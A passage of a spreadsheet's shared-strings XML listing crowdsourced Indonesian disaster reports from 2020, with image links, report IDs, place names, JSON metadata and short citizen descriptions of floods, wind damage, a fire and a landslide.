  </si>
  <si>
    <t>https:--images.petabencana.id-0cabbc51-b3ae-4cdb-861a-74916b96615b.jpg</t>
  </si>
  <si>
    <t>Cibadak</t>
  </si>
  <si>
    <t>Banjarsari</t>
  </si>
  <si>
    <t>51d2f66f-7611-47bd-94f8-6d39b07f0ee7</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-51d2f66f-7611-47bd-94f8-6d39b07f0ee7.jpg</t>
  </si>
  <si>
    <t>Air menggenangi rumah warga dan jalan</t>
  </si>
  <si>
    <t>Dadok Tunggul Hitam</t>
  </si>
  <si>
    <t>https:--pasangmata.detik.com-contribution-355307</t>
  </si>
  <si>
    <t>https:--akcdn.detik.net.id-community-pasma-2020-10-27-16037986282010385033.jpg</t>
  </si>
  <si>
    <t>Hujan Deras Sebabkan Jalan Kolonel Ahmad Syam Terendam Air</t>
  </si>
  <si>
    <t>Akibat hujan deras yang mengguyur wilayah Jatinangor, mengakibatkan air selokan di Jalan Kolonel Ahmad Syam Desa Sayang, Kec. Jatinangor Sumedang meluber ke jalan, Selasa, (27-10-2020) sore. Selain itu, diperparah juga dengan selokan yang kecil dan goron</t>
  </si>
  <si>
    <t>3ff088fb-3215-489f-baab-b04f457fce7e</t>
  </si>
  <si>
    <t>Terjadi kemarin sore setelah hujan kurang lebih selama 4 jam sejak pukul 12 siang WIB hingga sore hari pukul 4.</t>
  </si>
  <si>
    <t>Curug Wetan</t>
  </si>
  <si>
    <t>e1c9c530-6e6b-4abd-9d62-e0ab95d9c35a</t>
  </si>
  <si>
    <t>https:--images.petabencana.id-e1c9c530-6e6b-4abd-9d62-e0ab95d9c35a.jpg</t>
  </si>
  <si>
    <t>Banjir di dusun pecangakan rw 4, desa mujur lor, kecamatan kroya, kab cilacap</t>
  </si>
  <si>
    <t>0e16ea17-fd46-47d6-8119-6e89d984b4b2</t>
  </si>
  <si>
    <t>Gempa di Bandung Selatan terasa sangat guncangannya.</t>
  </si>
  <si>
    <t>5957e7d8-f5a3-4bab-afd5-dc8f923b3ae4</t>
  </si>
  <si>
    <t>{ "points": 1, "condition": 1, "report_type": "road", "accessabilityFailure": 1 }</t>
  </si>
  <si>
    <t>Kejapanan</t>
  </si>
  <si>
    <t>Gempol</t>
  </si>
  <si>
    <t>Pasuruan</t>
  </si>
  <si>
    <t>803a3381-9e9a-4de8-a646-a1e10acf872e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/803a3381-9e9a-4de8-a646-a1e10acf872e.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan utama perumahan PNR Karangbahagia Bekasi</t>
  </si>
  <si>
    <t>Sukaraya</t>
  </si>
  <si>
    <t>Karangbahagia</t>
  </si>
  <si>
    <t>0b0983a0-761e-40c3-80af-5491b3675c16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0b0983a0-761e-40c3-80af-5491b3675c16.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "249", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>e820945b-aecd-4cd9-83fd-9bd1fdcba44a</t>
  </si>
  <si>
    <t>Banjir luapan sungai di perumahan GPC</t>
  </si>
  <si>
    <t>d4c592c6-dc3e-42b8-9fad-c58615296758</t>
  </si>
  <si>
    <t>jln di dsn Rangkasan rt01/08 masih tergenag air dn sekarang agak mendingan mulai ada perubahan dari pada yang kemarin</t>
  </si>
  <si>
    <t>Tarisi</t>
  </si>
  <si>
    <t>Wanareja</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-GQj86p-dutQSkmTMYnQgq93KgL7cjyB9fZSvbqU-FdGP2bin_WUan3drtsoq8QMnhwwLmT6J1a2csvDqLuT8917F1juPg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "127", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pendangkalan saluran air</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZGsXDpSAVbphPorskmkPYl9kul-n473seWm-i4r7M3KTI4MSv0EH0JRSBr7iCrhPAyL8PIWhuw70w-7XfTbzbk4uxIrp=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap  mana ni petugas nya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Avz2POa42-X7pR8PDZ3R900K_WxwBFK52MZ2CKfKQGWGsxy-dj2Jy_sk3g6E3_DYadu3dQPj3-Qo4GSSye8i6BzY1DM=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil ..air dari Solokan  rembes keluar dari Solokan airnya bau sangat meresahkan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LFroIvdIMYGYukkVjAOMCC3PG5HIKxy2Q4Ut7DwPw7RbKOciILZngDcYBH6idUQX4-sFTgSluVYrUUekEv9r_NkBGkc=s480-c</t>
  </si>
  <si>
    <t>Kepada Yth, Pak Anies mengenai lumpur sungai ciliwung di kampung kulo jalan jatinegara barat yang sudah dikeruk tolong diangkut pakai truk agar tdk terbawa arus sungai lagi. Terima kasih"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/E_dR2l9ut2GPLvAU34pr-5B5kZkf3YsIi8A_fBICKFZINxdD0sqsAC-8M2FgkA0f3PKfL4f3MJcbdk8Bankzn4HTL6c=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1188", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>jalan umum yang ditutup menyebabkan banjir jika hujan rt10 rw 007 #kelurahan kalibata #kecamatan pancoran</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/355561</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/11/08/355561-16048268492057977726.mp4-03.jpg</t>
  </si>
  <si>
    <t>Saluran Air Tidak Berfungsi, Jalan Imam Bonjol Tergenang Air</t>
  </si>
  <si>
    <t>Akibat Drainase Tidak Berfungsi, Jalan Imam Bonjol Cikarang  Arah Bekasi Tergenang Air Setinggi 20cm.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZWympN6pO-IPpY6YwDwXIiTgniB3Y68dvIZkk7hIIQDAUCjNbtuiBlVi7-XLKpMdSLFg4DRU_ldNUjfCkUP63J_dzhSe=s480-c</t>
  </si>
  <si>
    <t>Di Rt.003/07 di masjid aljabbar bila turun hujan slalu banjir, dan  PSSU datang hanya selfi? aj tidak ada tindak lanjutnya paska banjir, padahal penyebabnya sudah ketahuan bahwa saluran air ada di atas perumahan mewah dan susah di bersikan , mohon pihak</t>
  </si>
  <si>
    <t>d31b9dfa-6689-4eef-aa14-164109efe13b</t>
  </si>
  <si>
    <t>Kebanjiran</t>
  </si>
  <si>
    <t>Sosok</t>
  </si>
  <si>
    <t>Tayan Hulu</t>
  </si>
  <si>
    <t>Sanggau</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/NWOqmzC3kTO9f3VOIAbthEvM-1UByyTq271RDsmQIv4L1VMGUuy8PrioyTa8SZu0zAhGY-6h6OBg_OKbMcpi5pZDLOA=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap  mohon bantuan nya untuk renovasi pintu air... rusak tdk bisa berfungsi. posisi di RT 08/07</t>
  </si>
  <si>
    <t>3b401ef6-3fb4-4cd9-9414-42d6765537b0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b401ef6-3fb4-4cd9-9414-42d6765537b0.jpg</t>
  </si>
  <si>
    <t>Sepanjang jalan.raya kopo citarip banjir nya</t>
  </si>
  <si>
    <t>Kopo</t>
  </si>
  <si>
    <t>Bojongloa Kaler</t>
  </si>
  <si>
    <t>caf70cf0-89b8-4a36-b673-d8b1b6547962</t>
  </si>
  <si>
    <t>Desa Radda Banjir</t>
  </si>
  <si>
    <t>Kappuna</t>
  </si>
  <si>
    <t>5a7207b8-327e-4f78-9e38-aa9245bf53a2</t>
  </si>
  <si>
    <t>didumai banjir subuh tadi</t>
  </si>
  <si>
    <t>Pangkalan Sesai</t>
  </si>
  <si>
    <t>Dumai Barat</t>
  </si>
  <si>
    <t>a27fd59b-295e-4df0-bf48-ce2acbac932a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a27fd59b-295e-4df0-bf48-ce2acbac932a.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 198 }</t>
  </si>
  <si>
    <t>Banjir di beberapa blok perumahan granit residen, deli serdang setinggi atap rumah warga. Pagi tadi, sabtu 14 november 2020.</t>
  </si>
  <si>
    <t>Tadukan Raga</t>
  </si>
  <si>
    <t>Sinembah Tanjung Muda Hilir</t>
  </si>
  <si>
    <t>Deli Serdang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/x0v5H2oo8jTzKjWgvHp92U3P9AwAJSLgJljcjTUdOZQeBKeW1Lq19XPlBmHpTwjBA0nDzL9TjhvEbtUy7tcn-Zmstxk=s480-c</t>
  </si>
  <si>
    <t>evaluasi ya</t>
  </si>
  <si>
    <t>8c317f0a-d6f6-4570-a062-9814f0bc7ca5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c317f0a-d6f6-4570-a062-9814f0bc7ca5.jpg</t>
  </si>
  <si>
    <t>Banjir melanda daerah Seliling, Alian, Kebumen dikarenakan hujan deras</t>
  </si>
  <si>
    <t>Seliling</t>
  </si>
  <si>
    <t>Alian</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/rez2tR-AmTcbGMGCYZc2mFOvdRwP4zwBp86E3R0tNRDTYuDyfUZ4BGj2OKO85NlIB5dWLgeierlqKcGaX49kcuPXfGBk=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "373", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>hujan gk hujan,kayak gubangan trs</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ChuuN672xVsexBEIGpMcG4fw8Z4E8PXBPJptL4cjcENzoeujkFHsQvmsF2RkFUhXGy4utrwXZmZwA6uznfHTuGaFeVBQpg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2329", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>pasang ait laut</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZFcdhpyLqCnO42AlX2nOA20VwJGB4B0Ilm_faqESMaWWtUqyPIWknAvXsdEKJxVYVp4PIzS8SXNTKhhfc83xGJmWfllj=s480-c</t>
  </si>
  <si>
    <t>akibat air pasang laut yg sangat tinggi sehingga limpas ke pemukiman warga dan tidak ada turapnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/WHN8fZybY9X8x_bVVl3cftXzDOO6cCCyzoxWrB2aViGfFwoEiE_HpeulDBb5Kk5ZQYZp5WXi98mFuCcIQFtDRdmcYPs=s480-c</t>
  </si>
  <si>
    <t>bisa jd salah 1 penyebab genangan air.Kkord u benahi ya.Tx</t>
  </si>
  <si>
    <t>d81a6229-aba8-4b91-b9f6-ca6d7edc8b5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d81a6229-aba8-4b91-b9f6-ca6d7edc8b5a.jpg</t>
  </si>
  <si>
    <t>Banjir depan GO akibat hujan deras</t>
  </si>
  <si>
    <t>Ngadirejo</t>
  </si>
  <si>
    <t>Kota Kediri</t>
  </si>
  <si>
    <t>Kediri</t>
  </si>
  <si>
    <t>ddc9e05b-1f71-46f9-a95a-129c4cf5847e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ddc9e05b-1f71-46f9-a95a-129c4cf5847e.jpg</t>
  </si>
  <si>
    <t>{ "impact": 0, "points": 1, "report_type": "wind" }</t>
  </si>
  <si>
    <t>Anginnya kencang sekali</t>
  </si>
  <si>
    <t>Banyuwangi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/jr5jd253xG2Wkkw_4RxVURTFcOcPm_HN9UitOc0Zd5q-qmHzHZmlt1hHDsmxuBfbT8bDr9haTodt9LPAdpGJzKKXaxZASw=s480-c</t>
  </si>
  <si>
    <t>air pasang hingga masuk ke pemukiman warga sudah hampir 1 minggu lebih</t>
  </si>
  <si>
    <t>abf59f37-1c5c-4aef-b4af-712090cbd64f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/abf59f37-1c5c-4aef-b4af-712090cbd64f.jpg</t>
  </si>
  <si>
    <t>Banjir di dusun sumbersari rt 04 dan rt 03 rw 11, desa padangsari, kec. Majenang, kab. Cilacap</t>
  </si>
  <si>
    <t>Padangsari</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8Ju4pg_8_4xeyTkQzhBXGsDUWT95LP0TbmyuJ5l9rDC7NbxWrfhKDbaGrJm73lacZrAQ33AGRSYHECWsEsSHO0CQY0M=s480-c</t>
  </si>
  <si>
    <t>tolong dibikinkan pintu air ya</t>
  </si>
  <si>
    <t>433f8d53-a346-4d1d-99de-094ed3fc4333</t>
  </si>
  <si>
    <t>https://images.petabencana.id/433f8d53-a346-4d1d-99de-094ed3fc4333.jpg</t>
  </si>
  <si>
    <t>Banjir Sidareja mulai dari tanggal 17 November 2020</t>
  </si>
  <si>
    <t>Gunungreja</t>
  </si>
  <si>
    <t>Sidareja</t>
  </si>
  <si>
    <t>18339854-ca54-4455-a06a-a6680c14f2e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/18339854-ca54-4455-a06a-a6680c14f2e4.jpg</t>
  </si>
  <si>
    <t>Kebalenan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/x-Ds3x1dfEErq_ecN3vIfxoTXTz-PHrjiToE4kMt-JIwJHWtCzFm-oZYxaLXrhifE936v8L9a4CQKO-5sbdNneMrg9A=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2004", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #lumpur #sampah memasuki musim penghujan tolong keduk goed jl lontar luar rt/rw04-05/04  sekarang jarang petugas keduk u sekitar  jl mangga dan sekitarnya nya.... padahal masih deket dengan kec dan kelurahan tugu utara... salam hormat</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/355851</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/11/22/16060344961724852816.jpg</t>
  </si>
  <si>
    <t>Duh! Diguyur Hujan Sebentar, Jalan Kincan Tergenang Air</t>
  </si>
  <si>
    <t>Diguyur hujan sebentar saja, Jalan Kincan kembali tergenang air. Harap perhatian dari pihak berwenang untuk mengatasi ini.</t>
  </si>
  <si>
    <t>f7e542ba-097b-4f95-aa85-ce60b4cc05c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7e542ba-097b-4f95-aa85-ce60b4cc05c7.jpg</t>
  </si>
  <si>
    <t>Kami berharap pemerintah Kabupaten Tangerang, Kecamatan Curug, Kelurahan Binong. Dapat mengatasi banjir khususnya di RW007.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/liZXDRL2l4OSK-HEFtno49u2mt46yF_06Mv-cbak---KakotVFVGqS6jvaTvHrR3WZgxKdTf4n_qx3V0NQ6Qc7dwb-07=s480-c</t>
  </si>
  <si>
    <t>Genangan, karna saluran air tersumbat sampah, air penuh</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/_HViGw90G5uk5Yhp36QJN5mFxGxHHbHLg7y9VGngY8pp_Ru23u1765S-0jhykFHRijBaV_pvfeMxAEkMhjZ__G0iTqg=s480-c</t>
  </si>
  <si>
    <t>slmt pg, mhn bt u pwmbenahan puntu air ini yg potensi jd sumber kebocoran di saat air kalu angke tunggi. trm ksh"</t>
  </si>
  <si>
    <t>af0a7d67-a6d5-4d95-b323-81501a8bd02a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/af0a7d67-a6d5-4d95-b323-81501a8bd02a.jpg</t>
  </si>
  <si>
    <t>Sebentar lagi air masuk kedalam rumah. Dua kamar mandi sudah tergenang air banjir</t>
  </si>
  <si>
    <t>Sempaja Selatan</t>
  </si>
  <si>
    <t>b4111055-4e74-4018-af04-d553f2be906a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4111055-4e74-4018-af04-d553f2be906a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3766", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>66879851-3f06-4327-930b-cfea92e9c3c9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/66879851-3f06-4327-930b-cfea92e9c3c9.jpg</t>
  </si>
  <si>
    <t>Jombang Wetan</t>
  </si>
  <si>
    <t>a1ff0f4a-52b7-44d0-8f66-674ab0121723</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1ff0f4a-52b7-44d0-8f66-674ab0121723.jpg</t>
  </si>
  <si>
    <t>Hati2 Yg mau masuk jalan protokol di Cilegon karena hujan dari malam sampai sekarang banjir</t>
  </si>
  <si>
    <t>Ramanuju</t>
  </si>
  <si>
    <t>04560273-edfa-4a31-add1-a8daff0e9e55</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04560273-edfa-4a31-add1-a8daff0e9e55.jpg</t>
  </si>
  <si>
    <t>Hati hati yg mau jalan Menuju protokol kota Cilegon karena banjir hujan sejak Malam..</t>
  </si>
  <si>
    <t>95a4a2f9-893d-4419-a4a6-4cc391b0a0f6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95a4a2f9-893d-4419-a4a6-4cc391b0a0f6.jpg</t>
  </si>
  <si>
    <t>semakin lama hujan semakin meninggi air sungai, semakin sering di alami 3 tahun belakangan ini, mohon bantuannya ??</t>
  </si>
  <si>
    <t>Cibeber</t>
  </si>
  <si>
    <t>e7c69e30-b494-495d-aeca-1ed3f9cc7734</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7c69e30-b494-495d-aeca-1ed3f9cc7734.jpg</t>
  </si>
  <si>
    <t>Banjir di desa kauman Rt 03/11 akibat rembesan pintu air sungai pemali kab. Brebes. Laporan SAR FKAM Brebes."</t>
  </si>
  <si>
    <t>42972450-5646-4c3e-9ea0-a77b39c248f2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/42972450-5646-4c3e-9ea0-a77b39c248f2.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 200, "report_type": "flood" }</t>
  </si>
  <si>
    <t>&lt;noscript&gt;</t>
  </si>
  <si>
    <t>1c47fc40-6545-4f5b-b504-931f3424d324</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c47fc40-6545-4f5b-b504-931f3424d324.jpg</t>
  </si>
  <si>
    <t>Banjir tinggi di wilayah Tanjung Selamat, Medan. Dari pemberitaan media setempat disebutkan sudah ada korban tewas.</t>
  </si>
  <si>
    <t>Tanjung Selamat</t>
  </si>
  <si>
    <t>Medan Tuntungan</t>
  </si>
  <si>
    <t>9f4b2324-5326-43cc-814c-cce176d7acc8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9f4b2324-5326-43cc-814c-cce176d7acc8.jpg</t>
  </si>
  <si>
    <t>H A M D A N</t>
  </si>
  <si>
    <t>Medan Maimun</t>
  </si>
  <si>
    <t>7d5487b9-0319-4b38-a019-d3abd2a5cfd8</t>
  </si>
  <si>
    <t>Ketinggian banjir hampir sepinggang orang dewasa</t>
  </si>
  <si>
    <t>Sunggal</t>
  </si>
  <si>
    <t>4f5b0c93-bc41-4cb8-8a82-bf383950004e</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "756", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>1fd06cd2-f13e-4b44-8cc2-c566207d919b</t>
  </si>
  <si>
    <t>Banjir sejak pagi hari</t>
  </si>
  <si>
    <t>Cinta Damai</t>
  </si>
  <si>
    <t>Medan Helvetia</t>
  </si>
  <si>
    <t>da251e06-f659-4984-bc84-cf7c0820253a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/da251e06-f659-4984-bc84-cf7c0820253a.jpg</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/QObnBBvOt2Yaqc70bHIqhzCDQFUIl-4zh225fCEEtxUCIMSCMYWkAY04qFgfKxJNccUn1SjjvFuo8ozVfyVK2wfS6n5c=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil jalanan dr arah Marunda ke arah BKT banjir dan jalan berlubang</t>
  </si>
  <si>
    <t>Segaramakmur</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Fe4ONP6Mu0msVf5uTAFxC6rSNJ2iDjQpSct3gX-pE-4VfqfCVQ7nU0i15b-tYc8tDZI5lkyEmxLRPFT-prUYlQLbkkOa8g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2157", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil jalanan berlubang saat hujan, potensi kecelakaan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/j9l51PvgXztNl7dUzUQ-jO2i-m9mRWC4UxO46cxYuZvBXRrcQqCjnKfHZ-C4DwSYR1hjDlUbwfyXhpI6YNBQ4ZuGypfi=s480-c</t>
  </si>
  <si>
    <t>harus dikeruk #BanjirKecil</t>
  </si>
  <si>
    <t>8c402b4e-1979-45ab-b366-091c0dcf6ed4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8c402b4e-1979-45ab-b366-091c0dcf6ed4.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "wind", "impact": 2 }</t>
  </si>
  <si>
    <t>Rumah Ambruk, Lokasi Rt/Rw.01/03 Kelurahan Baros Kecamatan Baros</t>
  </si>
  <si>
    <t>Baros</t>
  </si>
  <si>
    <t>09c27074-3466-4f4d-8db6-1647a2717a8f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09c27074-3466-4f4d-8db6-1647a2717a8f.jpg</t>
  </si>
  <si>
    <t>Rumah ambruk 03/01 Kel Baros kec Baros an Bu halimah</t>
  </si>
  <si>
    <t>Neglasari</t>
  </si>
  <si>
    <t>Nyalindung</t>
  </si>
  <si>
    <t>626090da-52dc-4221-b5ef-f95198f93ac1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/626090da-52dc-4221-b5ef-f95198f93ac1.jpg</t>
  </si>
  <si>
    <t>air sudah mulai naik dan masuk kedalam rumah</t>
  </si>
  <si>
    <t>Sindang</t>
  </si>
  <si>
    <t>Indramayu</t>
  </si>
  <si>
    <t>46194bee-809d-47f5-88f1-a35849c0c9ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46194bee-809d-47f5-88f1-a35849c0c9ef.jpg</t>
  </si>
  <si>
    <t>Lhoksukon pusat Aceh Utara</t>
  </si>
  <si>
    <t>Padang Sakti</t>
  </si>
  <si>
    <t>Muara Satu</t>
  </si>
  <si>
    <t>Lhokseumawe</t>
  </si>
  <si>
    <t>991189bf-5452-4f4e-9dd0-7680505dfb44</t>
  </si>
  <si>
    <t>Arus lalu lintas hampir lumpuh, mati listrik dan putus signal.</t>
  </si>
  <si>
    <t>Kelurahan Kota Lhoksukon</t>
  </si>
  <si>
    <t>Lhoksukon</t>
  </si>
  <si>
    <t>94ab8ad3-c236-43c3-9361-7d82787b355b</t>
  </si>
  <si>
    <t>Hujan deras+angin kencang+petir +pasang air laut. untuk air d dalam rumah sekitar 30cm.level air berbeda beda trgntg tinggj rmh</t>
  </si>
  <si>
    <t>Padang Luas</t>
  </si>
  <si>
    <t>Kurau</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MbakuPqQLCc5TdL4dCFWod56rDutkjb25EF6Pn9IAPtmUBbHxlSZshlUTok6Dz-ZUF6KxDGZxooQfkbLZpZa7L5_mXK_=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil si depan rumah no 59 gotnya tidak mengalir karena di bawah gorong gorong, klo hujan sedikit suka langsung banjir diatas mata kaki masuk rumah, kepada petugas terkait tolong bantuannya</t>
  </si>
  <si>
    <t>ea6e5732-3806-41e7-b8fb-4fe9c3ce20a3</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3329", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Wilayah cekungan, luapan terjadi saat sungai kecil penuh air</t>
  </si>
  <si>
    <t>Tlogosari Kulon</t>
  </si>
  <si>
    <t>00b7cc9c-18fd-4f81-99f4-02efbcec4a7c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00b7cc9c-18fd-4f81-99f4-02efbcec4a7c.jpg</t>
  </si>
  <si>
    <t>Beberapa desa terendam sampai ke atap rumah</t>
  </si>
  <si>
    <t>Gampong Aceh</t>
  </si>
  <si>
    <t>Idi Rayeuk</t>
  </si>
  <si>
    <t>Aceh Timur</t>
  </si>
  <si>
    <t>eccbdf92-4d4e-4a8c-abcd-9af11edcfa3f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eccbdf92-4d4e-4a8c-abcd-9af11edcfa3f.jpg</t>
  </si>
  <si>
    <t>Banjir di kabupaten aceh utara, akses jalan raya bbrp tilok sdh terendam bbrp msh bs dilalui. Posisi rumah yg lbh rendah dr jalan terendam"</t>
  </si>
  <si>
    <t>Matang Panyang</t>
  </si>
  <si>
    <t>Baktiya Barat</t>
  </si>
  <si>
    <t>f25a5169-3668-4f16-84d1-c8982226362c</t>
  </si>
  <si>
    <t>banjir di lebak rilis pukul 11:00 puluhan rumah terendam dan hanyut</t>
  </si>
  <si>
    <t>Cogreg</t>
  </si>
  <si>
    <t>Parung</t>
  </si>
  <si>
    <t>12ab662e-3731-4ed8-bc38-ec782b9c28db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/12ab662e-3731-4ed8-bc38-ec782b9c28db.jpg</t>
  </si>
  <si>
    <t>Terjadi angin kencang di kampung Gunteng Desa Bojong Kec Karangtengah Cianjur, kondisi listrik mati,</t>
  </si>
  <si>
    <t>Bojong</t>
  </si>
  <si>
    <t>Karangtengah</t>
  </si>
  <si>
    <t>Cianjur</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/aDWjBjYMbgoQ4aWsfzu89JcMWGfPZBXOBtEpvKNM7RkbyxnbMP-OBmoUw47M9naagTat9bMxsO6I_qyVSSbIsY-18Kxoew=s480-c</t>
  </si>
  <si>
    <t>Masih bln di proses  oleh SDA</t>
  </si>
  <si>
    <t>08ececb8-b2f8-4d55-a925-73fa508b1803</t>
  </si>
  <si>
    <t>https://images.petabencana.id/08ececb8-b2f8-4d55-a925-73fa508b1803.jpg</t>
  </si>
  <si>
    <t>Panyepen</t>
  </si>
  <si>
    <t>Jrengik</t>
  </si>
  <si>
    <t>Sampang</t>
  </si>
  <si>
    <t>40e26560-9132-45f7-8285-28b211e7de0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40e26560-9132-45f7-8285-28b211e7de0a.jpg</t>
  </si>
  <si>
    <t>Dalpenang</t>
  </si>
  <si>
    <t>6670a42b-da06-461d-a737-a47a8aebd5ba</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6670a42b-da06-461d-a737-a47a8aebd5ba.jpg</t>
  </si>
  <si>
    <t>fire</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 21.340776, "fireLocation": { "lat": -6.908612, "lng": 107.795641 }, "personLocation": { "lat": -6.915040, "lng": 107.699729 }, "fireRadius": { "lat": -6.908621, "lng": 107.795448 } }</t>
  </si>
  <si>
    <t>Kebakaran sebelah kios tanjungsari...</t>
  </si>
  <si>
    <t>Tanjungsari</t>
  </si>
  <si>
    <t>a020cad1-df02-4280-8a5e-7541fada5f30</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a020cad1-df02-4280-8a5e-7541fada5f30.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 3, "condition": 2 }</t>
  </si>
  <si>
    <t>longsor di Garut Selatan, korban ada ?600 jiwa serta blm ada bantuan BNPB, kami dari RPAI baru cek lokasi serta memberi sedikit bantuan</t>
  </si>
  <si>
    <t>Sukamulya</t>
  </si>
  <si>
    <t>Talegong</t>
  </si>
  <si>
    <t>72e659c1-5f9e-4d7b-98ad-68e37aec8df5</t>
  </si>
  <si>
    <t>Saat ini para korban mengungsi di SDN Sukamulya 01 jl.talegong kabupaten Garut aksesnya bisa melalui Pangalengan</t>
  </si>
  <si>
    <t>0a497576-39ed-4763-ae2b-819ab6977fec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0a497576-39ed-4763-ae2b-819ab6977fec.jpg</t>
  </si>
  <si>
    <t>Banjir tahunan ketika musim hujan di daerah Benjeng Kab. Gresik</t>
  </si>
  <si>
    <t>Munggugianti</t>
  </si>
  <si>
    <t>4f06e633-ef92-4037-9810-1cbe2e4d6a03</t>
  </si>
  <si>
    <t>Banjir daerah Kecamatan Siman bagian timur, kabupaten Ponorogo. Sulit dilalui oleh kendaraan motor roda 2.</t>
  </si>
  <si>
    <t>Siman</t>
  </si>
  <si>
    <t>55d78f7c-b657-4c8d-9d27-0e9c70722161</t>
  </si>
  <si>
    <t>Banjir dikarenakan air sungai kali lamong meluap dan kabarnua tanggul di daerah mojokerto jebol</t>
  </si>
  <si>
    <t>Klampok</t>
  </si>
  <si>
    <t>64c409d7-ddb3-42e5-83b2-1e7daa82a3a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/64c409d7-ddb3-42e5-83b2-1e7daa82a3a3.jpg</t>
  </si>
  <si>
    <t>Kondisi dalam rumah</t>
  </si>
  <si>
    <t>24ebdf9d-1f10-4f42-860d-a78603c1afd2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/24ebdf9d-1f10-4f42-860d-a78603c1afd2.jpg</t>
  </si>
  <si>
    <t>Terjadi setiap ada luwapan sungai bengawan, tinggi -+40 cm, tidak adanya pintu  tanggul</t>
  </si>
  <si>
